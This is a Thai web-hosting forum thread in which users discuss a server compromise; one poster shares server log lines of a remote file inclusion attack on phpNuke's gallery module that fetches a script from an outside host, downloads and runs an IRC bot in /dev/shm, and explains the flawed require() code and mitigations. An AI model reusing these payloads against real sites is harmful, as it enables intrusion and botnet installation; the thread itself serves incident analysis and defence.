D.o.s

วันสองวันนี้มีใครโดนไหมคะ กำลังเซ็งจัด

วันสองวันนี้มีใครโดนไหมคะ กำลังเซ็งจัด

ลักษณะและอาการที่โดนเป็นยังไงครับ จะได้ช่วยหาวิธีป้องกัน

ขอรายละเอียดด้วยครับ

ตอนนี้ server มีปัญหาเป็นระยะๆ คาดว่าโดนทั้ง data center ข้อความ error ที่เกิดจะบอกว่า

Admin กำลังทยอย block ค่ะ แต่เนื่องจากเครื่องเยอะ เลยต้องทยอยทำ งวดนี้เจอหนักแฮะ

Server ที่ผมโฮสอยู่เพิ่งโดนไปเมื่อวันศุกร์ที่ 9
สาเหตุมาจาก เวบผมโดนแฮกเอา dos มาวาง
เป็นเหตุให้ต้องปิด account ผมเพื่อให้เปิด server ต่อไปได้
เนื่องจากเป็นการเช่า dedicate ที่ ev1 ถ้าโดนซ้ำคงโดนปิด server ถาวร
ดังนั้นจึงต้องย้าย account ของผมไปไว้ server อื่นชั่วคราว
สำหรับช่องทางการแฮกนั้นใช้ประโยชน์จาก script php ที่เขียนไม่รัดกุม
โดยการผ่านตัวแปลมาทาง url

ตัวอย่าง log บางส่วน


"GET /main/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://****.***/*****/lila.jpg?&cmd=uname%20-a;%20id;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://*****/****/lila.jpg?&cmd=ls%20/tmp HTTP/1.0" 200 3730 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)"

"GET /main/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://conel.go.ro/inject.txt?&cmd=cd%20/dev/shm;wget%20********.***/~*******/swapd.tgz HTTP/1.1" 200 914 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

"GET /main/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://conel.go.ro/inject.txt?&cmd=cd%20/dev/shm;tar%20zxvf%20swapd.tgz;cd%20swapd;chmod%20777%20init;mv%20init%20dir;/dev/shm/swapd/dir HTTP/1.1" 200 862 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

จากที่ผมลองทำตามโดยใช้คำสั่ง ls ดูปรากฎว่าสามารถแสดงรายชื่อไฟล์ใน server ออกมาได้จริงๆ

**** (ไฟล์ swapd.tgz เป็น irc bot ตัวหนึ่งที่แฝงไฟล์ init.php ซึ่งเป็นไวรัสใน linux ไว้) ****

แนะนำให้ทำการตั้ง registry_global = off อย่างน้อยก็กันได้ระดับหนึ่ง

และนี่คือโค้ดใน upgrade_album.php


if (!$gallery->version) {
	require($GALLERY_BASEDIR . "init.php");
	}

จะเห็นว่าไม่ support registry_global off เพราะไม่มีการ import ตัวแปล $GALLERY_BASEDIR ซึ่ง module ที่โดนเป็น module gallery ของ phpnuke
หากเวบใหนใช้ gallery อยู่ให้ลบไฟล์ upgrade_album.php ออกเพื่อความปลอดภัย
อย่างไรก็ดีวิธีการนี้สามารถใช้ได้กับ ไฟล์ php ใดๆที่มีการ require โดยผ่านตัวแปล โดยไม่มีการป้องกันการส่งตัวแปลมาทาง method get

จากที่พบใน log ไฟล์มีการเรียกใช้คำสั้งต่างๆเช่น
ls
cd
id
chmod
wget
tar
ifconfig

โดยที่ตัวจัดการจะอยู่ที่ไฟล์ .gif .jpg .txt ที่ข้างในเป็น code php
ตัวอย่างโค้ดเมื่อเรียก lila.jpg ผ่าน browser


*** simple html eg <font color="#808080">
</font> ***
<?

คนทำ Hosting ที่ติดตามเรื่อง security จริงๆจังๆ ถ้ามีมากๆกว่านี้ก็จะดีมาก
แต่บางคราวลำบากใจครับ เช่น เรื่อง version ของ php เป็นต้น บางครั้งยังไม่
สามารถเปลี่ยนเป็น version ล่าสุดได้เลย ต้อง freeze ไว้่ เพราะลูกค้าจำนวนมาก
ไม่ยอมแก้ไข script

หรืออย่างเรื่อง register_global ก็เหมือนกัน ถ้าเป็น off บางคนก็โวยว่า script
ไม่ทำงาน (เพราะต้อง off ถึงทำงานได้)

ครับ หลายอย่างต้องพยายาม balance ให้มาก

ตอนนี้ php เป็น 4.3.8 แล้ว เพราะมี remote exploite ของ version ต่ำกว่านั้น
เศร้า :frowning:

ขอบคุณสำหรับความรู้ที่มา share กันครับ ยังไงเรื่อง censor ผมจะพยายามไม่ทำ
หรือกรณีจำเป็นจริงๆ เท่านั้น

คนที่ใช้ dedicated server ที่ ev1 และลงพวก album อะไรไว้ ควร update ด่วน
(เข้าใจว่าทาง fantastico?)

ข้อมูลเพิ่มเติมสำหรับ gallery exploite

google search for injection gallery_basedir

http://www.securityfocus.com/bid/9490/discussion/
http://www.net-security.org/vuln.php?id=1923

คำสั่งที่เกี่ยวข้องกับระบบได้แก่

exec, system, passthru

แน่นอนกว่าครับ